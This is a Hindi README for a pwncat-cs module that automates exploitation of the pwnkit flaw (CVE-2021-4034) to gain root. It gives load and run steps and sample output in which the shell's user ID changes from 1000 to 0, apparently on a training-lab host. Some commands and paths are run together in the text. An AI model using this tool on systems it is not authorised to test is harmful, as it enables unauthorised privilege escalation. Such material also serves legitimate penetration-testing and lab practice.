
pwncat मॉड्यूल जो स्वचालित रूप से CVE-2021-4034 (pwnkit) का शोषण करता है
इस मॉड्यूल का उद्देश्य pwncat का उपयोग करते समय लक्ष्य पर CVE-2021-4034 (pwnkit) का शोषण करने का प्रयास करना है।
किसी भी निर्देशिका को सेट करने, किसी स्रोत को संकलित करने या रिमोट लक्ष्य पर gcc रखने की आवश्यकता नहीं है; pwnkit मॉड्यूल pwncat फ्रेमवर्क का उपयोग करके स्वचालित रूप से इसका ध्यान रखता है।
pwnkit.py को अपने होस्ट पर कहीं कॉपी करें जहाँ pwncat-cs स्थापित है। जैसे: /home/user/pwncat_modsload /home/user/pwncat_modssearch pwnkit। आपको कुछ इस तरह दिखना चाहिए:(local) pwncat$ search pwnkit
Results
╷
Name │ Description
══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════
pwnkit │ Exploit CVE-2021-4034 to privesc to root
run pwnkit टाइप करें। यदि यह सफल होता है, तो आपको UID को 0 में बदलते हुए देखना चाहिए, और अब आप root होंगे। जैसे:(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0) manager.py:955
Module pwnkit completed successfully run.py:100
(local) pwncat$
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
load कॉल नहीं करना चाहते हैं, तो आप pwncat को स्टार्टअप पर इस मॉड्यूल को स्वचालित रूप से लोड करने के लिए इसे ~/.local/share/pwncat/modules में रख सकते हैं# Set the gcc path
set cross "/usr/bin/gcc"
Caleb Stewart को विशेष धन्यवाद जो डेव परिप्रेक्ष्य से pwncat फ्रेमवर्क सीखते समय सहायक रहे। मैं इसे मुख्य pwncat escalate मॉड्यूल में डालने के लिए एक पुल रिक्वेस्ट भेजूँगा जब मेरे पास खाली समय होगा... मैं वादा करता हूँ। :-)